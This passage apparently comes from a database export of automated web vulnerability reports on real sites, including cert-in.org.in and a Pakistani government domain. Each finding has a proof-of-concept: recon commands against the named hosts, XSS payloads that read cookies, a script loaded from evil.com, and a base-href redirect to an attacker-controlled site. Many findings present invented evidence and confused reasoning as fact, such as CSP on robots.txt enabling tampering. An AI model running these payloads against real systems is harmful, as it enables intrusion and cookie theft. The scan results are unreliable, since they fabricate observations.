While the scan itself is non-exploitative, its completion suggests the target system was subjected to comprehensive security probing that may have identified multiple areas of concern requiring further investigation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would initiate reconnaissance by running automated scanning tools against the target domain to enumerate potential entry points:\n\n```bash\n# Initial enumeration of available HTTP methods\ncurl -X OPTIONS https://ep.gov.pk/ -I\n\n# Directory brute-forcing to discover hidden paths\nffuf -u https://ep.gov.pk/FUZZ -w /path/to/directory-wordlist.txt\n\n# Server header analysis to identify technology stack\ncurl -I https://ep.gov.pk/\n```\n\nThe scanner would systematically test for common vulnerabilities including outdated software versions, insecure HTTP headers, sensitive file exposure, and weak authentication mechanisms. Each positive identification would provide attackers with vectors for deeper exploitation attempts.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than a direct vulnerability, the completion of such scanning activities indicates potential exposure to automated threat assessments. If conducted by malicious actors, these scans serve as precursors to targeted attacks that could result in data breaches, service compromise, or regulatory non-compliance. The organization faces increased risk profile due to visibility in automated security assessments, potentially leading to inclusion in threat actor targeting lists. 
Additionally, detection of scanning activities without proper monitoring controls may indicate insufficient intrusion detection capabilities, leaving the organization vulnerable to undetected reconnaissance efforts that precede more serious security incidents.","summary":{"total":1}},"summary":{"total":1}},{"_id":{"$oid":"6a1f2afed4174aff70379391"},"created_at":{"$date":"2026-06-02T19:11:58.381Z"},"url":"https://www.cert-in.org.in/","tool":"generate_web_vulnerability_report","result":{"url":"https://www.cert-in.org.in/","category":"web_vulnerability","timestamp":"2026-06-02T19:11:58.376415+00:00","report":"### Critical Findings\n(None identified)\n\n---\n\n### High Findings\n(None identified)\n\n---\n\n### Medium Findings\n\n#### CSP: Failure to Define Directive with No Fallback / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe Content Security Policy (CSP) header lacks definition for critical directives such as `default-src`, which serves as a fallback when other directives are unspecified. Omitting such directives effectively allows unrestricted resource loading, undermining the purpose of CSP and increasing susceptibility to cross-site scripting (XSS) and data injection attacks.\n\n**Attack Scenario (Proof of Concept)**\nIf an attacker identifies an XSS vector on the page, the absence of restrictive CSP policies enables execution of arbitrary scripts:\n```html\n<script>alert(document.cookie)</script>\n```\nThis payload would execute without being blocked due to lack of policy enforcement.\n\n**Business Impact**\nFailure to enforce strict CSP directives leaves users vulnerable to client-side attacks, potentially leading to session hijacking, phishing, or defacement. 
It also reflects poorly on compliance posture related to secure coding practices.\n\n---\n\n#### CSP: Wildcard Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUse of wildcard (`*`) in CSP directives significantly weakens protection mechanisms. For instance, setting `script-src *` permits script execution from any origin, negating the benefits of CSP in mitigating XSS risks.\n\n**Attack Scenario (Proof of Concept)**\nGiven a permissive directive like `script-src *`, an attacker injects malicious JavaScript sourced externally:\n```html\n<script src=\"https://evil.com/malicious.js\"></script>\n```\nSuch scripts would be executed because the CSP explicitly allows external domains.\n\n**Business Impact**\nWildcard usage undermines user trust and exposes the organization to reputational harm and regulatory scrutiny under frameworks requiring robust input/output sanitization controls.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nSimilar to the root path, the `/robots.txt` file's CSP omits essential directives like `default-src`. 
This omission implies that even auxiliary files lack proper content restrictions, making them susceptible to manipulation or exploitation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker modifies the `robots.txt` file to include references to malicious origins:\n```txt\nSitemap: https://attacker-controlled.com/sitemap.xml\nDisallow: /\n```\nWithout strong CSP enforcement, browsers do not restrict such external references.\n\n**Business Impact**\nImproper CSP configuration on publicly accessible files can aid attackers in mapping internal structures or redirecting crawlers toward harmful content, indirectly affecting SEO and visibility.\n\n---\n\n#### CSP: Wildcard Directive / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nPresence of wildcard directives in the CSP header for `robots.txt` reduces its effectiveness in preventing unauthorized resource inclusion. 
Attackers can exploit this weakness to reference untrusted domains within metadata files.\n\n**Attack Scenario (Proof of Concept)**\nBy leveraging a wildcard directive, an attacker includes a remote stylesheet or script inside the `robots.txt` context:\n```txt\nUser-agent: *\nAllow: /*\nStyle-src: *\n```\nThough unlikely to render visually, improper parsing engines might interpret such malformed entries.\n\n**Business Impact**\nWeak CSP settings reduce overall defense-in-depth strategy, increasing chances of successful supply chain or redirection-based attacks targeting search engine crawlers.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLike other paths, the `sitemap.xml` document lacks defined CSP fallbacks. This absence means there is no baseline restriction on what resources can be loaded alongside or referenced by the XML structure.\n\n**Attack Scenario (Proof of Concept)**\nMalicious actors may inject external links into the sitemap:\n```xml\n<url>\n  <loc>https://malicious-site.com/phishing</loc>\n</url>\n```\nBrowsers interpreting this file with loose CSP rules won’t block such references.\n\n**Business Impact**\nInsecure handling of structured metadata increases exposure to blackhat SEO tactics and compromises organic traffic integrity.\n\n---\n\n#### CSP: Wildcard Directive / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nWildcard use in CSP for `sitemap.xml` diminishes control over embedded or linked resources. 
Even though XML typically doesn't execute code, improper rendering contexts or parser flaws could enable unintended behavior.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker crafts a malformed entry referencing an external domain:\n```xml\n<image:image>\n  <image:loc>http://untrusted.example.com/image.jpg</image:loc>\n</image:image>\n```\nWith wildcard CSP, such URLs aren’t restricted during processing.\n\n**Business Impact**\nLack of granular CSP enforcement weakens site-wide defenses against third-party tampering and indirect exfiltration techniques.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `script-src` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe Content Security Policy (CSP) header for the target application does not define a `script-src` directive. This directive controls which sources are allowed to load or execute JavaScript on the page. Without explicit restrictions, browsers may default to allowing inline scripts and external script sources, increasing the risk of cross-site scripting (XSS) attacks. A properly configured CSP mitigates XSS by restricting script execution to trusted domains only.\n\nThis misconfiguration indicates that the application relies on implicit behavior rather than enforcing strict policies, leaving potential gaps for malicious actors to inject unauthorized scripts into the DOM context.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker who identifies this weakness can attempt to inject arbitrary JavaScript via reflected or stored XSS vectors. 
Since there's no enforced `script-src`, even inline event handlers or `<script>` tags from untrusted origins might be executed by the browser.\n\nExample payload injection:\n```html\n<script>alert(document.domain)</script>\n```\n\nIf the application reflects user input without proper sanitization—such as within a search parameter or comment field—an attacker could deliver such payloads directly to victims. The lack of `script-src` enforcement allows these scripts to run natively in the victim’s session context, enabling session hijacking, credential theft, or redirection to phishing pages.\n\n**Business Impact**\n\nWithout effective control over script execution, CERT-In's website becomes more susceptible to client-side attacks like XSS. These vulnerabilities could lead to impersonation of legitimate users, compromise of administrative sessions, or defacement of public-facing content. Given the authoritative nature of the domain, successful exploitation could undermine trust in official advisories or communications issued through the platform. Additionally, regulatory frameworks such as India’s IT Act or global standards like ISO/IEC 27001 may view inadequate CSP implementation as non-compliance with secure configuration practices.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `object-src` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe absence of the `object-src` directive in the site's Content Security Policy means that plugins such as Flash, Java applets, PDF viewers, and other embedded objects are unrestricted. 
By default, most modern browsers will allow loading resources from any origin when this directive is omitted, unless explicitly overridden elsewhere in policy logic.\n\nSuch permissiveness exposes the application to risks including clickjacking, plugin-based exploits, and embedding of malicious third-party content that bypasses traditional HTML filtering mechanisms.\n\n**Attack Scenario (Proof of Concept)**\n\nConsider an attacker injecting the following HTML snippet onto a vulnerable page:\n```html\n<object data=\"https://malicious.example.com/exploit.swf\" type=\"application/x-shockwave-flash\"></object>\n```\n\nIn environments where Adobe Flash or similar legacy technologies remain enabled (even partially), this object tag could trigger automatic download and execution of attacker-controlled code. Alternatively, embedding a specially crafted PDF or Silverlight component could exploit parser bugs or social engineering techniques to gain access to sensitive local resources or redirect traffic.\n\nEven if direct exploitation isn't possible due to browser hardening, attackers can still use such elements to track visitors or manipulate UI flows surreptitiously.\n\n**Business Impact**\n\nAllowing unrestricted use of `<object>`, `<embed>`, or `<applet>` tags increases exposure surface area significantly. It undermines defense-in-depth strategies aimed at preventing unauthorized binary execution or interaction with deprecated technologies. For a high-profile government entity like CERT-In, such lapses heighten susceptibility to targeted campaigns leveraging outdated plug-ins or zero-day flaws in lesser-known rendering engines. 
Furthermore, compliance audits under frameworks like NIST SP 800-53 or GDPR may flag insufficient CSP coverage as a failure in securing web interfaces against known threat patterns.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `base-uri` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe HTTP response headers do not include a restrictive `base-uri` directive in their Content Security Policy. This omission permits attackers to alter the base URL resolution scope using a `<base>` HTML element injected into the document. When manipulated, all relative URLs—including those used for script includes, form submissions, or navigation links—are resolved relative to the attacker-specified base URI instead of the original server.\n\nThis vulnerability enables various forms of redirection and resource manipulation, especially dangerous in combination with XSS or DOM clobbering scenarios.\n\n**Attack Scenario (Proof of Concept)**\n\nSuppose an attacker successfully injects the following HTML fragment:\n```html\n<base href=\"https://attacker-controlled-site.com/\">\n```\n\nSubsequent references to assets like `/js/main.js` or actions pointing to `/submit-report` would now resolve to `https://attacker-controlled-site.com/js/main.js` or `https://attacker-controlled-site.com/submit-report`. 
If the application dynamically loads scripts or submits forms based on relative paths, this change could result in exfiltration of credentials or execution of hostile JavaScript hosted remotely.\n\nAdditionally, phishing overlays or spoofed login portals could be rendered seamlessly because internal navigation remains visually consistent while being silently rerouted behind the scenes.\n\n**Business Impact**\n\nA missing `base-uri` directive weakens integrity guarantees around intra-page linking and dynamic asset retrieval. In worst-case scenarios involving compromised endpoints or insider threats, adversaries could leverage this flaw to redirect critical workflows—such as incident reporting portals—to rogue infrastructure they control. Such manipulations pose severe reputational harm to CERT-In, particularly during active cyber incidents where timely communication and accurate information flow are paramount. Regulatory bodies assessing cybersecurity posture may also interpret incomplete CSP deployment as indicative of broader governance deficiencies in secure software development lifecycle adherence.\n\n---\n\n### Low Findings\n\n#### Timestamp Disclosure - Unix / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUnix timestamps were detected in server responses, possibly indicating system time disclosure. 
Although seemingly benign, such information can assist attackers in timing-based attacks or profiling infrastructure uptime patterns.\n\n**Attack Scenario (Proof of Concept)**\nResponse contains visible timestamp:\n```json\n{\n  \"generated_at\": 1712345678\n}\n```\nUsing online converters or scripting tools, attackers determine exact generation times, aiding brute-force window estimation or correlation with logs.\n\n**Business Impact**\nMinor leakage of temporal metadata may support targeted reconnaissance efforts but poses minimal standalone threat unless combined with other vulnerabilities.\n\n---\n\n#### Timestamp Disclosure - Unix / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nTimestamps observed in the `robots.txt` response suggest server-side dynamic generation or logging activity. While low-risk individually, repeated disclosures help build behavioral profiles of backend systems.\n\n**Attack Scenario (Proof of Concept)**\nHeader or body reveals last-modified date:\n```\nLast-Modified: Wed, 05 Apr 2024 12:34:56 GMT\n```\nAttackers correlate update frequencies with known maintenance windows or patch cycles.\n\n**Business Impact**\nLimited impact; however, consistent timestamp leaks contribute to broader intelligence gathering campaigns aimed at optimizing future intrusions.\n\n---\n\n#### Timestamp Disclosure - Unix / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nTimestamps present in `sitemap.xml` indicate automated generation processes. 
Such indicators can expose scheduling routines or reveal stale content updates, providing insight into operational cadence.\n\n**Attack Scenario (Proof of Concept)**\nXML element shows creation time:\n```xml\n<lastmod>2024-04-05T12:34:56+00:00</lastmod>\n```\nAttackers infer update intervals and attempt to predict next regeneration events.\n\n**Business Impact**\nNegligible immediate risk, yet cumulative data points enhance adversary situational awareness and targeting precision.\n\n---\n\n#### Content Security Policy Configuration / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe `default-src` CSP directive is entirely absent from the main page’s HTTP headers. As a foundational policy component, its absence leaves numerous content categories unprotected, reducing overall XSS mitigation efficacy.\n\n**Attack Scenario (Proof of Concept)**\nNo `default-src` defined:\n```\nContent-Security-Policy: script-src 'self'; img-src *\n```\nAllows images from any source and defaults remaining directives to unrestricted behavior.\n\n**Business Impact**\nPartial CSP implementation offers limited protection and creates false confidence in security posture, especially concerning modern web threats reliant on multi-vector payloads.\n\n---\n\n### Informational Findings\n\n#### Multiple IPs Found / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe asset resolves to multiple IP addresses: 103.218.109.197, 14.139.54.229, and 59.176.167.109. This indicates that the domain is likely hosted behind a load balancer or distributed infrastructure. 
While not inherently a vulnerability, identifying multiple endpoints can provide attackers with additional reconnaissance vectors, including potential bypasses if some servers are misconfigured differently than others.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to resolve all A records associated with the domain:\n```bash\n$ dig A www.cert-in.org.in +short\n103.218.109.197\n14.139.54.229\n59.176.167.109\n```\nSubsequently, they may probe each endpoint directly via HTTP(S) to identify version inconsistencies, exposed administrative interfaces, or differing security configurations across backend hosts.\n\n**Business Impact**\nWhile this finding does not pose direct risk, it increases the attack surface by exposing more network endpoints. If any of these IPs host outdated or misconfigured services, it could lead to unauthorized access or service compromise.\n\n---\n\n#### Re-examine Cache-control Directives / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nMissing or improperly configured cache-control headers allow intermediaries (browsers/proxies) to store sensitive content locally. 
Without explicit directives like `no-store` or `private`, confidential data may persist beyond intended scope.\n\n**Attack Scenario (Proof of Concept)**\nSensitive API response lacks cache headers:\n```\nHTTP/1.1 200 OK\nContent-Type: application/json\n```\nBrowser caches response, enabling retrieval after logout via back-button navigation or history inspection.\n\n**Business Impact**\nPotential privacy violations and unauthorized access to authenticated sessions or personal data stored in local caches.\n\n---\n\n#### Re-examine Cache-control Directives / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nAbsence of cache-control headers on public files like `robots.txt` may cause outdated versions to linger in proxy caches, misleading crawlers about current disallowances or sitemaps.\n\n**Attack Scenario (Proof of Concept)**\nOlder version of `robots.txt` remains cached despite recent changes:\n```\nDisallow: /admin/\n```\nSearch engines continue respecting old rules until TTL expires, delaying discovery of newly exposed paths.\n\n**Business Impact**\nStale caching affects crawl efficiency and delays indexing improvements, impacting discoverability and potentially exposing deprecated sections prematurely.\n\n---\n\n#### Re-examine Cache-control Directives / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLack of cache-control directives on `sitemap.xml` leads to inconsistent propagation across distributed networks. 
Outdated sitemaps may remain active longer than necessary, causing incorrect indexing behaviors.\n\n**Attack Scenario (Proof of Concept)**\nNewly removed pages still listed in cached sitemap:\n```xml\n<url><loc>/deprecated-page.html</loc></url>\n```\nSearch bots revisit non-existent URLs repeatedly, generating unnecessary error traffic.\n\n**Business Impact**\nDegraded SEO performance and increased server load due to redundant requests stemming from stale sitemap caches.\n\n---\n\n#### User Agent Fuzzer / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nDifferences in server responses based on varying User-Agent strings suggest adaptive logic or device-specific routing. While useful for responsive design, inconsistent behavior may hint at hidden functionality or debug interfaces.\n\n**Attack Scenario (Proof of Concept)**\nSending modified UA string triggers alternate response:\n```bash\ncurl -H \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)\" https://www.cert-in.org.in/\n```\nServer returns different HTML layout or exposes admin panel elements.\n\n**Business Impact**\nUnintended feature toggling or debugging features exposed to public can facilitate further probing or privilege escalation attempts.\n\n---\n\n#### User Agent Fuzzer / cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in |\n\n**Description**\nBehavioral variance upon altering User-Agent headers suggests conditional rendering or routing logic. 
This pattern often correlates with mobile/desktop switching or bot detection mechanisms.\n\n**Attack Scenario (Proof of Concept)**\nSwitching between desktop and mobile UAs yields distinct responses:\n```bash\ncurl -H \"User-Agent: iPhone Safari\" https://www.cert-in.org.in/\ncurl -H \"User-Agent: Chrome Desktop\" https://www.cert-in.org.in/\n```\nComparing hashes reveals divergent output templates.\n\n**Business Impact**\nInconsistent delivery models complicate testing coverage and increase likelihood of undetected vulnerabilities specific to certain clients.\n\n---\n\n#### User Agent Fuzzer / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nAltering User-Agent strings while accessing `sitemap.xml` produces varied outputs, suggesting dynamic generation tailored to requester type. Such variability may introduce inconsistencies in search engine indexing workflows.\n\n**Attack Scenario (Proof of Concept)**\nDifferent sitemaps returned depending on UA:\n```bash\ncurl -H \"User-Agent: Bingbot\" https://www.cert-in.org.in/sitemap.xml\ncurl -H \"User-Agent: Firefox\" https://www.cert-in.org.in/sitemap.xml\n```\nEach call returns unique `<urlset>` contents.\n\n**Business Impact**\nFragmented sitemap delivery hampers unified crawling strategies and introduces ambiguity in content governance.\n\n---\n\n#### User Agent Fuzzer / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nResponses differ when querying `robots.txt` with various User-Agents, implying rule customization per crawler identity. 
Misconfigurations here can result in unintended exclusions or exposures.\n\n**Attack Scenario (Proof of Concept)**\nCustomized rules served to specific bots:\n```txt\nUser-agent: Googlebot\nDisallow: /private/\n\nUser-agent: *\nAllow: /\n```\nManual override bypasses general restrictions.\n\n**Business Impact**\nMisaligned robot directives affect crawl permissions and expose unintended directories to automated scanners.\n\n---\n\n#### User Agent Fuzzer / Images Directory\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/Images |\n\n**Description**\nAccessing the `/Images` directory with altered User-Agent strings results in differing directory listings or file availability. This inconsistency may point to environment-specific deployments or legacy configurations.\n\n**Attack Scenario (Proof of Concept)**\nDirectory listing enabled only for mobile UAs:\n```bash\ncurl -H \"User-Agent: Android Browser\" https://www.cert-in.org.in/Images/\n```\nReturns full index instead of forbidden status.\n\n**Business Impact**\nExposure of directory contents increases risk of discovering backup files, temporary uploads, or development artifacts.","summary":{"total":23}},"summary":{"total":23}},{"_id":{"$oid":"6a1f302ecdcdcbd0a53116bf"},"created_at":{"$date":"2026-06-02T19:34:06.510Z"},"url":"https://onmark.co.in/nmu/","tool":"generate_web_vulnerability_report","result":{"url":"https://onmark.co.in/nmu/","category":"web_vulnerability","timestamp":"2026-06-02T19:34:06.504612+00:00","report":"### [Web Server Manual Found / https://onmark.co.in/nmu/ / /manual/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe presence of `/manual/` indicates that the web server hosts documentation related to its configuration or 
operation. While not inherently insecure, exposing such directories publicly may provide attackers with insights into the software stack, version numbers, and potential misconfigurations. This information can be leveraged during reconnaissance phases of an attack.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker performs directory brute-forcing using tools like `dirb` or `gobuster`, identifying accessible paths including `/manual/`. Upon visiting the path, they discover detailed documentation about the server environment, potentially revealing outdated modules or insecure configurations.\n\nExample command:\n```bash\ngobuster dir -u https://onmark.co.in/nmu/ -w /path/to/wordlist.txt\n```\n\n**Business Impact**  \nExposure of internal documentation increases the attack surface by providing adversaries with contextual knowledge about the system architecture. Although no direct exploitation occurs, this contributes to targeted attacks and reduces the effort required for successful compromise.\n\n---\n\n### [Directory Indexing Found / https://onmark.co.in/nmu/ / /manual/images/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nDirectory indexing allows users to list all files within a given directory if no index file is present. In this case, accessing `/manual/images/` reveals a browsable list of image resources. This exposes filenames, versions, and possibly sensitive artifacts inadvertently left behind.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker navigates directly to `https://onmark.co.in/nmu/manual/images/` and observes a directory listing containing multiple files. 
They download these assets to analyze metadata or search for hardcoded credentials, development notes, or legacy components indicating vulnerabilities.\n\nSample browser access:\n```\nGET /manual/images/\nHost: onmark.co.in\n```\n\nResponse includes:\n```html\n<pre>\n<a href=\"logo.png\">logo.png</a>     2024-01-01 12:00\n<a href=\"dev_notes.txt\">dev_notes.txt</a>   2023-12-15 10:30\n</pre>\n```\n\n**Business Impact**  \nSensitive project-related files might be exposed unintentionally, leading to unauthorized access to intellectual property, developer comments, or staging/test environments. Attackers can use this data to refine targeting strategies or exploit weak points in the infrastructure.\n\n---\n\n### [Apache Default File Found / https://onmark.co.in/nmu/ / /icons/README]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe presence of `/icons/README` suggests that default Apache installation files remain accessible. These files often contain version-specific details or references to other default paths, which can aid fingerprinting efforts and expose unnecessary information about the server setup.\n\n**Attack Scenario (Proof of Concept)**  \nBy requesting `https://onmark.co.in/nmu/icons/README`, an attacker retrieves the contents of the README file, which typically contains Apache version info and usage instructions. Using this, they correlate known vulnerabilities associated with that specific version.\n\nRequest:\n```http\nGET /icons/README HTTP/1.1\nHost: onmark.co.in\n```\n\nResponse excerpt:\n```\nApache HTTP Server Documentation Project\nVersion 2.4.x\n...\n```\n\n**Business Impact**  \nRevealing server version details facilitates targeted exploitation attempts based on known CVEs tied to those versions. 
It also signals poor hardening practices, increasing confidence among attackers regarding further exploration opportunities.\n\n---\n\n### [Deprecated X-Frame-Options Header / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe `X-Frame-Options` header has been superseded by the more flexible `Content-Security-Policy` (CSP) with the `frame-ancestors` directive. Its continued use implies outdated security posture and may leave applications vulnerable to clickjacking unless properly configured.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker creates a malicious iframe embedding the vulnerable page at `https://onmark.co.in/nmu/`. Since there's no modern CSP protection, the embedded content renders normally, enabling UI redressing attacks where victims unknowingly interact with disguised elements.\n\nMalicious HTML snippet:\n```html\n<iframe src=\"https://onmark.co.in/nmu/\" width=\"100%\" height=\"500\"></iframe>\n```\n\n**Business Impact**  \nWithout proper framing controls, attackers can trick users into performing unintended actions—such as submitting forms or clicking buttons—within the context of their authenticated sessions, resulting in account takeovers or fraudulent transactions.\n\n---\n\n### [Missing X-Content-Type-Options Header / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe absence of the `X-Content-Type-Options: nosniff` header allows browsers to perform MIME sniffing, interpreting content differently than intended. 
This behavior can lead to XSS when untrusted input is rendered as executable code due to incorrect type inference.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a file named `exploit.jpg` that actually contains JavaScript. Without the `nosniff` header, the browser interprets it as script rather than image content upon retrieval, executing arbitrary code under the domain’s origin.\n\nSample upload payload:\n```js\nalert(document.cookie);\n```\n\nUploaded via form submission and later accessed via:\n```\nGET /uploads/exploit.jpg HTTP/1.1\nHost: onmark.co.in\n```\n\nIf interpreted as JS, triggers alert box showing cookies.\n\n**Business Impact**  \nEnables bypasses of content restrictions, facilitating stored/persistent XSS scenarios even when file extensions appear benign. Can result in session hijacking, credential theft, or phishing campaigns leveraging trusted domains.\n\n---\n\n### [Missing Anti-clickjacking Header / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nLack of anti-clickjacking protections enables embedding of the application inside frames controlled by third parties. This vulnerability supports UI redressing attacks where user interactions occur without awareness, compromising confidentiality and integrity.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker crafts a phishing page hosting an invisible overlay over legitimate buttons on the framed site (`https://onmark.co.in/nmu/`). 
